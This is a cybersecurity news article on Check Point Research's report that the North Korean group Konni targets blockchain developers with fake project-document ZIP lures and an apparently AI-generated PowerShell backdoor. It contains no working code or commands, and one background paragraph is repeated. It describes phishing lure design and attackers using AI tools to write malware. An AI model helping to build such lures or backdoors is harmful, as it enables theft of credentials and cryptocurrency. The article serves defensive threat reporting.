North Koreans now using AI-generated PowerShell backdoor to target devs
Konni, a North Korean threat actor, has been using PowerShell malware generated using AI tools to attack developers and engineering teams in the blockchain sector. The phishing campaign has targeted users in Japan, Australia, and India.
According to Check Point Research, Konni’s malicious activity goes beyond its typical focus area, indicating broader targeting across the Asia-Pacific region. The hacking group usually attacks organizations in South Korea, Russia, Ukraine, and Europe.
The campaign targets software developers and engineering teams with expertise in, or access to, blockchain-related resources and infrastructure. Konni uses lure content designed to look like legitimate project documentation, often tied to blockchain and crypto initiatives.
More specifically, the campaign leverages ZIP files mimicking project requirements-themed documents hosted on Discord’s content delivery network to unleash a multi-stage attack chain.
The lure documents include technical details such as architecture, technology stacks, development timelines, and in some cases, budgets and delivery milestones.
“This pattern suggests an intent to compromise development environments, thereby obtaining access to sensitive assets, including infrastructure, API credentials, wallet access, and ultimately cryptocurrency holdings,” said the researchers in a technical report.
To succeed, the attackers deploy an AI-generated PowerShell backdoor. The script has an unusually polished structure, but embedded directly in the code is the comment: “# <– your permanent project UUID.”
“This phrasing is highly characteristic of LLM-generated code, where the model explicitly instructs a human user on how to customize a placeholder value. Such comments are commonly observed in AI-produced scripts and tutorials,” Check Point explains.
All this, say the researchers, highlights the growing use of AI by threat actors, including, of course, North Korean groups.
“Instead of focusing on individual end-users, the campaign goal seems to be to establish a foothold in development environments, where compromise can provide broader downstream access across multiple projects and services,” Check Point said.
“The introduction of AI-assisted tooling suggests an effort to accelerate development and standardize code while continuing to rely on proven delivery methods and social engineering.”
Active since at least 2014, the group typically relies on spear-phishing to deliver weaponized documents themed around geopolitical issues and activity on the Korean Peninsula.
Konni is best known for targeting organizations and individuals in South Korea, with a focus on diplomatic channels, international relations, NGOs, academia, and government. It’s also tracked as Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia.
Active since at least 2014, the group typically relies on spear-phishing to deliver weaponized documents themed around geopolitical issues and activity on the Korean Peninsula.
In November, Konni was found targeting Android devices by exploiting Google’s asset-tracking service, Find Hub, to remotely reset victims' devices and erase their personal data.
Unlock more exclusive Cybernews content on YouTube.
